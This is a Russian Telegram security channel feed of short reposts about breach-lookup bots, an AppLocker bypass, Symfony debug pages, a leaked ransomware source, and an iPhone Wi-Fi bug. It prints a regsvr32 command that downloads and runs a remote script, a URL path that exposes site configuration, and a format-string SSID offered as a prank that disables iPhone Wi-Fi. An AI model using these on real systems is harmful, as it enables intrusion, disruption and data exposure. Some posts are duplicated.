Forwarded from LeakCheck
💬 Что случилось с ботом @mailsearchbot? Рассказываем: 12 марта бот был удален телеграмом по запросу Роскомнадзора. Не спасло даже изменение модели бота (https://xn--r1a.website/leakcheck/111)
❔Каковы следующие действия и как теперь проверять данные?
Мы попробуем оспорить блокировку, но ничего не гарантируем. Вы по-прежнему можете пользоваться ресурсом leakcheck.appspot.com, правда на английском языке. Не думаем, что это составит какие-либо трудности, если вы когда-нибудь на него заходили и регистрировались.
📣 И другие новости проекта
🔸 Мы добавили форму проверки данных прямо на главную страницу сайта, она позволит узнать, на каких сайтах "засветились" ваши данные
🔸 В тестовом режиме подключили оплату через Google и Apple Pay
♦️ Удаление данных с сайта
Хоть такая функция существует уже давно, мы расскажем о ней отдельно: вы можете направить запрос на removal@leakcheck.net с почты, информацию о которой вы желаете удалить с нашего ресурса, также можно сделать и с юзернеймами, и с аккаунтом на сервисе. Рассматриваем заявки в течение 24 часов.
В следующем посте покажем, через что проходит утечка перед добавлением на сервис.
По вопросам любого характера. И пресс-служба, и техническая поддержка:
✉️ the@leakcheck.net или ✍️ @lc_cs
❔Каковы следующие действия и как теперь проверять данные?
Мы попробуем оспорить блокировку, но ничего не гарантируем. Вы по-прежнему можете пользоваться ресурсом leakcheck.appspot.com, правда на английском языке. Не думаем, что это составит какие-либо трудности, если вы когда-нибудь на него заходили и регистрировались.
📣 И другие новости проекта
🔸 Мы добавили форму проверки данных прямо на главную страницу сайта, она позволит узнать, на каких сайтах "засветились" ваши данные
🔸 В тестовом режиме подключили оплату через Google и Apple Pay
♦️ Удаление данных с сайта
Хоть такая функция существует уже давно, мы расскажем о ней отдельно: вы можете направить запрос на removal@leakcheck.net с почты, информацию о которой вы желаете удалить с нашего ресурса, также можно сделать и с юзернеймами, и с аккаунтом на сервисе. Рассматриваем заявки в течение 24 часов.
В следующем посте покажем, через что проходит утечка перед добавлением на сервис.
По вопросам любого характера. И пресс-служба, и техническая поддержка:
✉️ the@leakcheck.net или ✍️ @lc_cs
👍4🤮1
Открывал доступ к обратному поиску в @getfb_bot на один час, кто успел воспользоваться молодец!
Forwarded from Order of Six Angles
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
Forwarded from Кавычка (Bo0oM)
Но не все знают, что можно вызвать
Если этот контроллер доступен, интереснее вызвать сразу последнюю страницу
/app_dev.php/_configurator, который запустит установку движка (оно тебе надо?). Если этот контроллер доступен, интереснее вызвать сразу последнюю страницу
/app_dev.php/_configurator/final, который покажет текущий конфиг сайта.Forwarded from Sys-Admin InfoSec
Open SysConf'21 - скоро!
Всем привет! Давненько мы не устраивали грамотных и полезных движух, предлагаю подбить свои знания и опыт в кучу и поделиться этим с народом на Open SysConf!)
Формат и цели
Очно/Удаленно без разницы, кому и как удобно. Преследуемые нами цели - шаринг знаний из ИТ/ИБ/Ops или смежных областей, в свободной и по возможности доступной форме изложения, без рекламы, "прибитого гвоздями спонсора" и т.п. Приоритет только на свои силы, ресурсы, знания.
Доклады
На сегодня уже есть ряд намеченных тем и докладов, есть свободные слоты на участие в качестве докладчика, вступить в команду/подать заявку на доклад может любой желающий:
• https://forms.gle/98yKu4xBquKm3qJWA ( Запасной URL )
Кто еще не знает о чем идет речь и каков контекст - информацию по тематике докладов с позапрошлого Open SysConf'19 можно посмотреть на сайте:
• https://sysconf.io/
Готовность
Время, дата, место, доклады, финансы еще выбираются/собираются, предположительно это будет в период +-июнь. С апдейтом по сабжу вернусь через неделю.
Связь / Помощь
Дополнительные вопросы/предложения/etc, можно задавать в нашей SysConf группе:
• https://xn--r1a.website/OpenSysConf
Или написать сообщение админу канала (в описании) или связаться по почте:
• sys-admin@sysconf.io
Помочь можно через донат здесь:
• https://money.yandex.ru/to/41001928837376
Open SysConf'21 - скоро!
Всем привет! Давненько мы не устраивали грамотных и полезных движух, предлагаю подбить свои знания и опыт в кучу и поделиться этим с народом на Open SysConf!)
Формат и цели
Очно/Удаленно без разницы, кому и как удобно. Преследуемые нами цели - шаринг знаний из ИТ/ИБ/Ops или смежных областей, в свободной и по возможности доступной форме изложения, без рекламы, "прибитого гвоздями спонсора" и т.п. Приоритет только на свои силы, ресурсы, знания.
Доклады
На сегодня уже есть ряд намеченных тем и докладов, есть свободные слоты на участие в качестве докладчика, вступить в команду/подать заявку на доклад может любой желающий:
• https://forms.gle/98yKu4xBquKm3qJWA ( Запасной URL )
Кто еще не знает о чем идет речь и каков контекст - информацию по тематике докладов с позапрошлого Open SysConf'19 можно посмотреть на сайте:
• https://sysconf.io/
Готовность
Время, дата, место, доклады, финансы еще выбираются/собираются, предположительно это будет в период +-июнь. С апдейтом по сабжу вернусь через неделю.
Связь / Помощь
Дополнительные вопросы/предложения/etc, можно задавать в нашей SysConf группе:
• https://xn--r1a.website/OpenSysConf
Или написать сообщение админу канала (в описании) или связаться по почте:
• sys-admin@sysconf.io
Помочь можно через донат здесь:
• https://money.yandex.ru/to/41001928837376
👍5
Forwarded from Codeby
Курс «Тестирование web приложений на проникновение»
🔥 От команды The Codeby 🔥
Старт курса 1 июня 2021
✔️ Погружение в мир пентеста;
✔️ Самые актуальные методы пассивного сбора информации о web приложении;
✔️ Базовые и продвинутые техники активного фаззинга;
✔️ Эксплуатация и защита от всех видов современных уязвимостей веб приложений;
✔️ Повышение привилегий на скомпрометированном сервере;
✔️ Социальная инженерия для пентестера и защита от неё;
✔️ Практическая лаборатория для продвинутой эксплуатации уязвимостей.
Узнать подробности и записаться на курс можно здесь: https://codeby.net/threads/kurs-testirovanie-veb-prilozhenij-na-proniknovenie-s-nulja-codeby-web-security.64482/
#Обучение
🔥 От команды The Codeby 🔥
Старт курса 1 июня 2021
✔️ Погружение в мир пентеста;
✔️ Самые актуальные методы пассивного сбора информации о web приложении;
✔️ Базовые и продвинутые техники активного фаззинга;
✔️ Эксплуатация и защита от всех видов современных уязвимостей веб приложений;
✔️ Повышение привилегий на скомпрометированном сервере;
✔️ Социальная инженерия для пентестера и защита от неё;
✔️ Практическая лаборатория для продвинутой эксплуатации уязвимостей.
Узнать подробности и записаться на курс можно здесь: https://codeby.net/threads/kurs-testirovanie-veb-prilozhenij-na-proniknovenie-s-nulja-codeby-web-security.64482/
#Обучение
Forwarded from LeakCheck
📧 Перезапустили MailSearchBot, работает по новой модели и отображает только происхождение утечек, паролей в выдачу бота включено не будет. Возможно, такой вариант проверки кому-то будет удобнее использования сайта.
@gdepochtabot
@gdepochtabot
👍2
В сеть утек исходный код шифровальщика Paradise Ransomware так что ждем появления новых модификаций данного зловреда.
@b4tr_channel
@b4tr_channel
👍2
@getfb_bot приболел FB забанил все мои аккаунты, на восстановление нужно время, а пока можете поддержать проект донатом:
https://qiwi.com/n/B4TRJAN
https://qiwi.com/n/B4TRJAN
Если подключить свой iPhone к Wi-Fi точке с SSID “%p%s%s%s%s%n” то он навсегда отключит функцию WiFi. Ни перезагрузка, ни изменение имени точки доступа не поможет. Пользуйтесь!
Автор: https://twitter.com/vm_call
@b4tr_channel
Автор: https://twitter.com/vm_call
@b4tr_channel
👍1
b0t10101
Если подключить свой iPhone к Wi-Fi точке с SSID “%p%s%s%s%s%n” то он навсегда отключит функцию WiFi. Ни перезагрузка, ни изменение имени точки доступа не поможет. Пользуйтесь! Автор: https://twitter.com/vm_call @b4tr_channel
fix:
Settings=>General=>Reset=>Reset Network Settings
Настройки=>Основные=>Сброс=>Сброс настройки сети
Settings=>General=>Reset=>Reset Network Settings
Настройки=>Основные=>Сброс=>Сброс настройки сети
Комбайн для исследования IP и сайтов в виде TG-бота
@iptools_robot будет полезен как расследователям, так и безопасникам.
Бот обладает очень широким функционалом, можно проверить IP, Whois, получить количество ссылок на сайте или узнать CMS, и это только некоторые из функций.
Сам бот отвечает практически мгновенно и предоставляет доступ к использованию многих полезных Python-инструментов прямо в Telegram.
А для тех, кто хочет заработать мы предусмотрели реферальную систему под 7%.
#типареклама
@iptools_robot будет полезен как расследователям, так и безопасникам.
Бот обладает очень широким функционалом, можно проверить IP, Whois, получить количество ссылок на сайте или узнать CMS, и это только некоторые из функций.
Сам бот отвечает практически мгновенно и предоставляет доступ к использованию многих полезных Python-инструментов прямо в Telegram.
А для тех, кто хочет заработать мы предусмотрели реферальную систему под 7%.
#типареклама
👍4
Forwarded from Intercepter-NG
YouTube
☢️ЗАРАЗА🗡️ ИНТЕРВЬЮ с Владимиром Дубровиным🔥
🎞️В ЭТОМ ВИДЕО🎞️
00:00 - Intro
01:10 - Почему ник ЗАРАЗА
01:47 - Знакомство с компьютером и программированием
06:56 - Вопрос про юзерпик
07:38 - Первая профессия
11:00 - security.nnov.ru
15:37 - Про advisory
20:10 - Про написание эксплоитов
24:47 - Про книгу…
00:00 - Intro
01:10 - Почему ник ЗАРАЗА
01:47 - Знакомство с компьютером и программированием
06:56 - Вопрос про юзерпик
07:38 - Первая профессия
11:00 - security.nnov.ru
15:37 - Про advisory
20:10 - Про написание эксплоитов
24:47 - Про книгу…
👍2